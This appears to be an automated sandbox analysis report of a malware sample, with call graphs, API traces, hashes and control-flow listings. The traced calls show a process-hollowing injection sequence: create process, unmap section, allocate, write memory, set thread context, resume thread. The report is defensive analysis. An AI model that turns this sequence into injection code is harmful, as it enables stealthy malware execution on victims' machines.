20482->20483 20208 27f2a55 20213 27f314e 20208->20213 20231 27f30f0 20208->20231 20248 27f30b8 20208->20248 20209 27f2a64 20214 27f30dc 20213->20214 20216 27f3151 20213->20216 20265 27f36f0 20214->20265 20274 27f3a72 20214->20274 20283 27f3bd4 20214->20283 20291 27f37b5 20214->20291 20295 27f3856 20214->20295 20303 27f359a 20214->20303 20312 27f353b 20214->20312 20323 27f35bb 20214->20323 20335 27f39c0 20214->20335 20344 27f3760 20214->20344 20353 27f36a4 20214->20353 20358 27f36aa 20214->20358 20363 27f3bcc 20214->20363 20368 27f392f 20214->20368 20215 27f312e 20215->20209 20216->20209 20232 27f310a 20231->20232 20234 27f35bb 6 API calls 20232->20234 20235 27f353b 6 API calls 20232->20235 20236 27f359a 4 API calls 20232->20236 20237 27f3856 4 API calls 20232->20237 20238 27f37b5 2 API calls 20232->20238 20239 27f3bd4 4 API calls 20232->20239 20240 27f3a72 4 API calls 20232->20240 20241 27f36f0 4 API calls 20232->20241 20242 27f392f 2 API calls 20232->20242 20243 27f3bcc 2 API calls 20232->20243 20244 27f36aa 2 API calls 20232->20244 20245 27f36a4 2 API calls 20232->20245 20246 27f3760 4 API calls 20232->20246 20247 27f39c0 4 API calls 20232->20247 20233 27f312e 20233->20209 20234->20233 20235->20233 20236->20233 20237->20233 20238->20233 20239->20233 20240->20233 20241->20233 20242->20233 20243->20233 20244->20233 20245->20233 20246->20233 20247->20233 20249 27f30bc 20248->20249 20251 27f35bb 6 API calls 20249->20251 20252 27f353b 6 API calls 20249->20252 20253 27f359a 4 API calls 20249->20253 20254 27f3856 4 API calls 20249->20254 20255 27f37b5 2 API calls 20249->20255 20256 27f3bd4 4 API calls 20249->20256 20257 27f3a72 4 API calls 20249->20257 20258 27f36f0 4 API calls 20249->20258 20259 27f392f 2 API calls 20249->20259 20260 27f3bcc 2 API calls 20249->20260 20261 27f36aa 2 API calls 20249->20261 20262 27f36a4 2 API calls 20249->20262 20263 27f3760 4 API calls 20249->20263 20264 27f39c0 4 API calls 20249->20264 20250 27f312e 20250->20209 20251->20250 20252->20250 20253->20250 20254->20250 20255->20250 20256->20250 20257->20250 20258->20250 20259->20250 20260->20250 20261->20250 20262->20250 20263->20250 20264->20250 20266 27f35a6 20265->20266 20266->20265 20267 27f3911 20266->20267 20268 27f35b8 20266->20268 20381 27f1ea8 20266->20381 20385 27f1ea1 20266->20385 20267->20215 20373 27f19b8 20268->20373 20377 27f19c0 20268->20377 20269 27f3628 20269->20215 20275 27f3911 20274->20275 20276 27f35a6 20274->20276 20275->20215 20276->20275 20277 27f35b8 20276->20277 20279 27f1ea8 Wow64SetThreadContext 20276->20279 20280 27f1ea1 Wow64SetThreadContext 20276->20280 20281 27f19b8 ResumeThread 20277->20281 20282 27f19c0 ResumeThread 20277->20282 20278 27f3628 20278->20215 20279->20276 20280->20276 20281->20278 20282->20278 20284 27f35b8 20283->20284 20285 27f35a6 20283->20285 20289 27f19b8 ResumeThread 20284->20289 20290 27f19c0 ResumeThread 20284->20290 20285->20284 20286 27f3628 20285->20286 20287 27f1ea8 Wow64SetThreadContext 20285->20287 20288 27f1ea1 Wow64SetThreadContext 20285->20288 20286->20215 20287->20285 20288->20285 20289->20286 20290->20286 20389 27f2209 20291->20389 20393 27f2210 20291->20393 20292 27f37c9 20397 27f1f78 20295->20397 20401 27f1f80 20295->20401 20296 27f3e5e 20296->20215 20297 27f3874 20297->20296 20405 27f2038 20297->20405 20409 27f2040 20297->20409 20298 27f3967 20298->20215 20305 27f35a6 20303->20305 20304 27f35b8 20310 27f19b8 ResumeThread 20304->20310 20311 27f19c0 ResumeThread 20304->20311 20305->20304 20306 27f3911 20305->20306 20308 27f1ea8 Wow64SetThreadContext 20305->20308 20309 27f1ea1 Wow64SetThreadContext 20305->20309 20306->20215 20307 27f3628 20307->20215 20308->20305 20309->20305 20310->20307 20311->20307 20413 27f22c8 20312->20413 20417 27f22bc 20312->20417 20421 27f2128 20323->20421 20425 27f2130 20323->20425 20324 27f35a6 20324->20215 20325 27f3cf5 20324->20325 20326 27f3911 20324->20326 20327 27f35b8 20324->20327 20333 27f1ea8 Wow64SetThreadContext 20324->20333 20334 27f1ea1 Wow64SetThreadContext 20324->20334 20325->20215 20326->20215 20331 27f19b8 ResumeThread 20327->20331 20332 27f19c0 ResumeThread 20327->20332 20328 27f3628 20328->20215 20331->20328 20332->20328 20333->20324 20334->20324 20337 27f35a6 20335->20337 20336 27f35b8 20340 27f19b8 ResumeThread 20336->20340 20341 27f19c0 ResumeThread 20336->20341 20337->20336 20338 27f3911 20337->20338 20342 27f1ea8 Wow64SetThreadContext 20337->20342 20343 27f1ea1 Wow64SetThreadContext 20337->20343 20338->20215 20339 27f3628 20339->20215 20340->20339 20341->20339 20342->20337 20343->20337 20345 27f35a6 20344->20345 20346 27f3911 20345->20346 20347 27f35b8 20345->20347 20349 27f1ea8 Wow64SetThreadContext 20345->20349 20350 27f1ea1 Wow64SetThreadContext 20345->20350 20346->20215 20351 27f19b8 ResumeThread 20347->20351 20352 27f19c0 ResumeThread 20347->20352 20348 27f3628 20348->20215 20349->20345 20350->20345 20351->20348 20352->20348 20354 27f3822 20353->20354 20356 27f2038 WriteProcessMemory 20354->20356 20357 27f2040 WriteProcessMemory 20354->20357 20355 27f3ebe 20356->20355 20357->20355 20359 27f36cd 20358->20359 20361 27f2038 WriteProcessMemory 20359->20361 20362 27f2040 WriteProcessMemory 20359->20362 20360 27f3f86 20361->20360 20362->20360 20364 27f3af3 20363->20364 20364->20363 20365 27f3e10 20364->20365 20366 27f1ea8 Wow64SetThreadContext 20364->20366 20367 27f1ea1 Wow64SetThreadContext 20364->20367 20365->20215 20366->20364 20367->20364 20369 27f3935 20368->20369 20371 27f2038 WriteProcessMemory 20369->20371 20372 27f2040 WriteProcessMemory 20369->20372 20370 27f3967 20370->20215 20371->20370 20372->20370 20374 27f19bc ResumeThread 20373->20374 20376 27f1a31 20374->20376 20376->20269 20378 27f1a00 ResumeThread 20377->20378 20380 27f1a31 20378->20380 20380->20269 20382 27f1eed Wow64SetThreadContext 20381->20382 20384 27f1f35 20382->20384 20384->20266 20386 27f1ea4 Wow64SetThreadContext 20385->20386 20388 27f1f35 20386->20388 20388->20266 20390 27f220c NtUnmapViewOfSection 20389->20390 20392 27f2284 20390->20392 20392->20292 20394 27f2250 NtUnmapViewOfSection 20393->20394 20396 27f2284 20394->20396 20396->20292 20398 27f1f7d 20397->20398 20399 27f1fca VirtualAllocEx 20398->20399 20400 27f1ffb 20398->20400 20399->20400 20400->20297 20402 27f1fc0 VirtualAllocEx 20401->20402 20404 27f1ffb 20402->20404 20404->20297 20406 27f203c WriteProcessMemory 20405->20406 20408 27f20df 20406->20408 20408->20298 20410 27f2088 WriteProcessMemory 20409->20410 20412 27f20df 20410->20412 20412->20298 20414 27f2351 CreateProcessA 20413->20414 20416 27f2513 20414->20416 20418 27f22c0 CreateProcessA 20417->20418 20420 27f2513 20418->20420 20422 27f212c ReadProcessMemory 20421->20422 20424 27f21bf 20422->20424 20424->20324 20426 27f217b ReadProcessMemory 20425->20426 20428 27f21bf 20426->20428 20428->20324 20429 c74668 20430 c7467a 20429->20430 20431 c74686 20430->20431 20433 c74779 20430->20433 20434 c7479d 20433->20434 20438 c74888 20434->20438 20442 c74878 20434->20442 20440 c748af 20438->20440 20439 c7498c 20439->20439 20440->20439 20446 c744e0 20440->20446 20444 c74882 20442->20444 20443 c7498c 20444->20443 20445 c744e0 CreateActCtxA 20444->20445 20445->20443 20447 c75918 CreateActCtxA 20446->20447 20449 c759db 20447->20449 20484 c7d438 20485 c7d47e GetCurrentProcess 20484->20485 20487 c7d4d0 GetCurrentThread 20485->20487 20488 c7d4c9 20485->20488 20489 c7d506 20487->20489 20490 c7d50d GetCurrentProcess 20487->20490 20488->20487 20489->20490 20491 c7d543 20490->20491 20492 c7d56b GetCurrentThreadId 20491->20492 20493 c7d59c 20492->20493

                                  Executed Functions

                                  Function 027F2209 Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 027F2275
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: SectionUnmapView
                                  • String ID:
                                  • API String ID: 498011366-0
                                  • Opcode ID: e6cc51b13fd2bbcf0b744423fb3b5427d612932798fd1e3c221e0dca2a5a7180
                                  • Instruction ID: 4514b473e8015a6f278a506828f27ad9143e05a14c0068b43953f25656e2a6f8
                                  • Opcode Fuzzy Hash: e6cc51b13fd2bbcf0b744423fb3b5427d612932798fd1e3c221e0dca2a5a7180
                                  • Instruction Fuzzy Hash: 0F1167719043498FDB24DFAAC845BEFFBF5AB88320F14882ED959A7340CB759944CB90
                                  Function 027F2210 Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 027F2275
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: SectionUnmapView
                                  • String ID:
                                  • API String ID: 498011366-0
                                  • Opcode ID: 66e593c7dd302e72a0c9c28feb63da81aca09e2bfda1e2decda446235acbcad0
                                  • Instruction ID: b5b00763220c918ae98027ea41d47c5ff3f1f2ee0a088be4e1a15dc300627347
                                  • Opcode Fuzzy Hash: 66e593c7dd302e72a0c9c28feb63da81aca09e2bfda1e2decda446235acbcad0
                                  • Instruction Fuzzy Hash: 011158719003498FDB20DFAAC445BDFFBF5AF88320F14842AD519A7240CB75A544CFA0
                                  Function 00C7D429 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00C7D4B6
                                  • GetCurrentThread.KERNEL32 ref: 00C7D4F3
                                  • GetCurrentProcess.KERNEL32 ref: 00C7D530
                                  • GetCurrentThreadId.KERNEL32 ref: 00C7D589
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499507575.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c70000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: fda1aad6b1570f1df67988a74e87b415b5384c1df0377eb3daf7de4ac9e7ba91
                                  • Instruction ID: 2517cc47d39129fd395812bb8f539b318aedffefc5b5beb7d2d06681c41e3fbb
                                  • Opcode Fuzzy Hash: fda1aad6b1570f1df67988a74e87b415b5384c1df0377eb3daf7de4ac9e7ba91
                                  • Instruction Fuzzy Hash: 885178B49003098FDB14DFAAD548BAEBBF1AF88304F20C059E419A7390DB746944CF65
                                  Function 00C7D438 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00C7D4B6
                                  • GetCurrentThread.KERNEL32 ref: 00C7D4F3
                                  • GetCurrentProcess.KERNEL32 ref: 00C7D530
                                  • GetCurrentThreadId.KERNEL32 ref: 00C7D589
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499507575.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c70000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 8b22d95a1a2a914d8e58c38ebe4361f6a8e5c186236de98ef870bf0b1f0cdb9c
                                  • Instruction ID: 7e8f989c23aafb99446a3c44a373a8f1e25933e3eb5430dcc092745b5a27ab22
                                  • Opcode Fuzzy Hash: 8b22d95a1a2a914d8e58c38ebe4361f6a8e5c186236de98ef870bf0b1f0cdb9c
                                  • Instruction Fuzzy Hash: 565155B49003098FDB14DFAAD548BAEBBF1AF88314F208459E41AA7390DB74A944CF65
                                  Function 027F22BC Relevance: 1.8, APIs: 1, Instructions: 257processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 45 27f22bc-27f22be 46 27f22c2 45->46 47 27f22c0 45->47 48 27f22c6-27f235d 46->48 49 27f22c4 46->49 47->46 52 27f235f-27f2369 48->52 53 27f2396-27f23b6 48->53 49->48 52->53 54 27f236b-27f236d 52->54 60 27f23ef-27f241e 53->60 61 27f23b8-27f23c2 53->61 55 27f236f-27f2379 54->55 56 27f2390-27f2393 54->56 58 27f237d-27f238c 55->58 59 27f237b 55->59 56->53 58->58 62 27f238e 58->62 59->58 67 27f2457-27f2511 CreateProcessA 60->67 68 27f2420-27f242a 60->68 61->60 63 27f23c4-27f23c6 61->63 62->56 65 27f23e9-27f23ec 63->65 66 27f23c8-27f23d2 63->66 65->60 69 27f23d6-27f23e5 66->69 70 27f23d4 66->70 81 27f251a-27f25a0 67->81 82 27f2513-27f2519 67->82 68->67 71 27f242c-27f242e 68->71 69->69 72 27f23e7 69->72 70->69 73 27f2451-27f2454 71->73 74 27f2430-27f243a 71->74 72->65 73->67 76 27f243e-27f244d 74->76 77 27f243c 74->77 76->76 78 27f244f 76->78 77->76 78->73 92 27f25a2-27f25a6 81->92 93 27f25b0-27f25b4 81->93 82->81 92->93 94 27f25a8 92->94 95 27f25b6-27f25ba 93->95 96 27f25c4-27f25c8 93->96 94->93 95->96 97 27f25bc 95->97 98 27f25ca-27f25ce 96->98 99 27f25d8-27f25dc 96->99 97->96 98->99 100 27f25d0 98->100 101 27f25ee-27f25f5 99->101 102 27f25de-27f25e4 99->102 100->99 103 27f260c 101->103 104 27f25f7-27f2606 101->104 102->101 106 27f260d 103->106 104->103 106->106
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 027F24FE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 3b79026a3b70a11c88be0028f5fc241cd0ee31a01474efc15ff1f2d6c024ad0e
                                  • Instruction ID: ad1d573246c5ca670ff256ec9692c508f7c118537835d409610f6eaf5cc7e448
                                  • Opcode Fuzzy Hash: 3b79026a3b70a11c88be0028f5fc241cd0ee31a01474efc15ff1f2d6c024ad0e
                                  • Instruction Fuzzy Hash: 7FA18C71D046298FEB60CF68C8517EEBBB2BF48314F1481A9DD09A7381DB749985CF91
                                  Function 027F22C8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 107 27f22c8-27f235d 109 27f235f-27f2369 107->109 110 27f2396-27f23b6 107->110 109->110 111 27f236b-27f236d 109->111 117 27f23ef-27f241e 110->117 118 27f23b8-27f23c2 110->118 112 27f236f-27f2379 111->112 113 27f2390-27f2393 111->113 115 27f237d-27f238c 112->115 116 27f237b 112->116 113->110 115->115 119 27f238e 115->119 116->115 124 27f2457-27f2511 CreateProcessA 117->124 125 27f2420-27f242a 117->125 118->117 120 27f23c4-27f23c6 118->120 119->113 122 27f23e9-27f23ec 120->122 123 27f23c8-27f23d2 120->123 122->117 126 27f23d6-27f23e5 123->126 127 27f23d4 123->127 138 27f251a-27f25a0 124->138 139 27f2513-27f2519 124->139 125->124 128 27f242c-27f242e 125->128 126->126 129 27f23e7 126->129 127->126 130 27f2451-27f2454 128->130 131 27f2430-27f243a 128->131 129->122 130->124 133 27f243e-27f244d 131->133 134 27f243c 131->134 133->133 135 27f244f 133->135 134->133 135->130 149 27f25a2-27f25a6 138->149 150 27f25b0-27f25b4 138->150 139->138 149->150 151 27f25a8 149->151 152 27f25b6-27f25ba 150->152 153 27f25c4-27f25c8 150->153 151->150 152->153 154 27f25bc 152->154 155 27f25ca-27f25ce 153->155 156 27f25d8-27f25dc 153->156 154->153 155->156 157 27f25d0 155->157 158 27f25ee-27f25f5 156->158 159 27f25de-27f25e4 156->159 157->156 160 27f260c 158->160 161 27f25f7-27f2606 158->161 159->158 163 27f260d 160->163 161->160 163->163
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 027F24FE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: c704264a0496df9248f812a1320d808b946b65b729ae3945a4dafc5bb16bfb80
                                  • Instruction ID: 35ba88e4e02b66321fcf0ad9ffabc4ae0239ba2015296a7518360dbf32873774
                                  • Opcode Fuzzy Hash: c704264a0496df9248f812a1320d808b946b65b729ae3945a4dafc5bb16bfb80
                                  • Instruction Fuzzy Hash: 52917B71D042298FEB60CF68C851BEDBBB2BF48314F1481A9D918A7381DB749985CF91
                                  Function 00C7ADA8 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 164 c7ada8-c7adb7 165 c7ade3-c7ade7 164->165 166 c7adb9-c7adc6 call c7a100 164->166 167 c7adfb-c7ae3c 165->167 168 c7ade9-c7adf3 165->168 173 c7addc 166->173 174 c7adc8 166->174 175 c7ae3e-c7ae46 167->175 176 c7ae49-c7ae57 167->176 168->167 173->165 224 c7adce call c7b031 174->224 225 c7adce call c7b040 174->225 175->176 177 c7ae7b-c7ae7d 176->177 178 c7ae59-c7ae5e 176->178 180 c7ae80-c7ae87 177->180 181 c7ae60-c7ae67 call c7a10c 178->181 182 c7ae69 178->182 179 c7add4-c7add6 179->173 183 c7af18-c7af2f 179->183 184 c7ae94-c7ae9b 180->184 185 c7ae89-c7ae91 180->185 186 c7ae6b-c7ae79 181->186 182->186 197 c7af31-c7af90 183->197 188 c7ae9d-c7aea5 184->188 189 c7aea8-c7aeaa call c7a11c 184->189 185->184 186->180 188->189 193 c7aeaf-c7aeb1 189->193 195 c7aeb3-c7aebb 193->195 196 c7aebe-c7aec3 193->196 195->196 198 c7aec5-c7aecc 196->198 199 c7aee1-c7aeee 196->199 215 c7af92-c7af94 197->215 198->199 200 c7aece-c7aede call c7a12c call c7a13c 198->200 204 c7af11-c7af17 199->204 205 c7aef0-c7af0e 199->205 200->199 205->204 216 c7af96-c7afbe 215->216 217 c7afc0-c7afd8 215->217 216->217 219 c7afe0-c7b00b GetModuleHandleW 217->219 220 c7afda-c7afdd 217->220 221 c7b014-c7b028 219->221 222 c7b00d-c7b013 219->222 220->219 222->221 224->179 225->179
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00C7AFFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499507575.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c70000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: cb84906cc58780adfde25fe584c2b8168102fbb83e3bc8c0edf8733c7115796b
                                  • Instruction ID: 180efd8e2c1d8f2508e07b3a7e0b00ccc6d523f2791b60376443b004d851c8e7
                                  • Opcode Fuzzy Hash: cb84906cc58780adfde25fe584c2b8168102fbb83e3bc8c0edf8733c7115796b
                                  • Instruction Fuzzy Hash: 658166B0A00B058FDB24DF2AD44175ABBF1FF88304F00892ED49ADBA50D775E959CB91
                                  Function 027F07D0 Relevance: 1.7, APIs: 1, Instructions: 157windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 226 27f07d0-27f07d8 228 27f07db-27f07e9 226->228 229 27f0857-27f085f 226->229 231 27f07eb-27f080a 228->231 232 27f0867-27f468a 228->232 230 27f45a0-27f4607 229->230 240 27f4609-27f460f 230->240 241 27f4610-27f4624 230->241 234 27f080e-27f0839 231->234 235 27f080c 231->235 236 27f4691-27f46a2 PostMessageW 232->236 244 27f083b-27f083f 234->244 245 27f08b7-27f08b8 234->245 235->234 238 27f46ab-27f46b3 236->238 239 27f46a4-27f46aa 236->239 238->236 250 27f46b5-27f46bf 238->250 239->238 240->241 246 27f0840-27f0841 244->246 247 27f08ba-27f08bb 245->247 248 27f0843-27f084a 245->248 247->230 252 27f084e-27f0853 248->252 253 27f084c 248->253 252->229 253->252
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 027F4695
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 77a5000d86fc00dac98c49052e72c90933aac33768840c30e25f516775f9877e
                                  • Instruction ID: c6305b693dabed88ebf7ec1e5fbd2d8d4a53b85d575b344954855aba7164b455
                                  • Opcode Fuzzy Hash: 77a5000d86fc00dac98c49052e72c90933aac33768840c30e25f516775f9877e
                                  • Instruction Fuzzy Hash: 3C51CFB580C3C98FDB12CFA9C8987DABFF0EF4A214F05409AC184AB253C375A545CBA1
                                  Function 00C7590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 255 c7590c-c75916 256 c75918-c759d9 CreateActCtxA 255->256 258 c759e2-c75a3c 256->258 259 c759db-c759e1 256->259 266 c75a3e-c75a41 258->266 267 c75a4b-c75a4f 258->267 259->258 266->267 268 c75a51-c75a5d 267->268 269 c75a60 267->269 268->269 271 c75a61 269->271 271->271
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00C759C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499507575.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c70000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 35b7d6b5a023820f3c14b9893453a87f190a6a2f2fa6d13c20b68de2a42fc6a6
                                  • Instruction ID: 399ae27dd3f2631a3c314c14ff3b2e9ac0c32ff572e06c43705266ffbe579e2e
                                  • Opcode Fuzzy Hash: 35b7d6b5a023820f3c14b9893453a87f190a6a2f2fa6d13c20b68de2a42fc6a6
                                  • Instruction Fuzzy Hash: B9410371C00719CFEB24DFA9C88479EBBB5BF89714F20816AD408AB251DBB55945CF90
                                  Function 00C744E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 272 c744e0-c759d9 CreateActCtxA 275 c759e2-c75a3c 272->275 276 c759db-c759e1 272->276 283 c75a3e-c75a41 275->283 284 c75a4b-c75a4f 275->284 276->275 283->284 285 c75a51-c75a5d 284->285 286 c75a60 284->286 285->286 288 c75a61 286->288 288->288
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00C759C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499507575.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c70000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 5eeba06e462a28509b4032a8cbcc43aa6d545fdd357ceb3f3c142b8825b5521b
                                  • Instruction ID: ef0a9ad92f5b8af8b97f813be34d731afeaadf4a80716a66d5673bb651021113
                                  • Opcode Fuzzy Hash: 5eeba06e462a28509b4032a8cbcc43aa6d545fdd357ceb3f3c142b8825b5521b
                                  • Instruction Fuzzy Hash: B841F471C0071DCFEB24DFA9C84479EBBB5BF88714F208169D508AB251DBB55946CF90
                                  Function 027F2038 Relevance: 1.6, APIs: 1, Instructions: 76injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 289 27f2038-27f203a 290 27f203e-27f208e 289->290 291 27f203c 289->291 295 27f209e-27f20dd WriteProcessMemory 290->295 296 27f2090-27f209c 290->296 291->290 298 27f20df-27f20e5 295->298 299 27f20e6-27f2116 295->299 296->295 298->299
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 027F20D0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: ecdbbdc31e55fb333a5129df9d0c514b1a97f6ab1fc357ee181acc07c7362aef
                                  • Instruction ID: cce22785427f1a2f61e244550a2a7e4489f8401971976ea8a63631ad6d270249
                                  • Opcode Fuzzy Hash: ecdbbdc31e55fb333a5129df9d0c514b1a97f6ab1fc357ee181acc07c7362aef
                                  • Instruction Fuzzy Hash: 313146729043499FDB50CFA9C881BEEBBF5FF48310F108429EA59A7341C7799941CBA0
                                  Function 027F2128 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 303 27f2128-27f212a 304 27f212e-27f21bd ReadProcessMemory 303->304 305 27f212c-27f212d 303->305 310 27f21bf-27f21c5 304->310 311 27f21c6-27f21f6 304->311 305->304 310->311
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 027F21B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 788b8056b3823ae64c49b5a5b63237600b7ec520030b890bd6f67485a801bdf9
                                  • Instruction ID: b0359cc4a1b6cc5c6ac629e81c317d0ab9f613dfda115320214c3255961e6996
                                  • Opcode Fuzzy Hash: 788b8056b3823ae64c49b5a5b63237600b7ec520030b890bd6f67485a801bdf9
                                  • Instruction Fuzzy Hash: 472137718003499FDF10DFA9C885BEEBBF5FF48310F108429EA59A7251C7799905CBA4
                                  Function 027F2040 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 315 27f2040-27f208e 317 27f209e-27f20dd WriteProcessMemory 315->317 318 27f2090-27f209c 315->318 320 27f20df-27f20e5 317->320 321 27f20e6-27f2116 317->321 318->317 320->321
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 027F20D0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: ab72c16eb2bb0214d99ec4a209e57a941bc910368d9934bede994c3977e16bab
                                  • Instruction ID: 179ecd85fc15f2e15e7fe15d230196266af944814003ee8fcdb6df26f87632e7
                                  • Opcode Fuzzy Hash: ab72c16eb2bb0214d99ec4a209e57a941bc910368d9934bede994c3977e16bab
                                  • Instruction Fuzzy Hash: 732124729003499FDB10DFAAC881BDEBBF5FF48310F10842AE919A7341C7799954CBA0
                                  Function 027F1EA1 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 325 27f1ea1-27f1ea2 326 27f1ea6-27f1ef3 325->326 327 27f1ea4 325->327 330 27f1ef5-27f1f01 326->330 331 27f1f03-27f1f33 Wow64SetThreadContext 326->331 327->326 330->331 333 27f1f3c-27f1f6c 331->333 334 27f1f35-27f1f3b 331->334 334->333
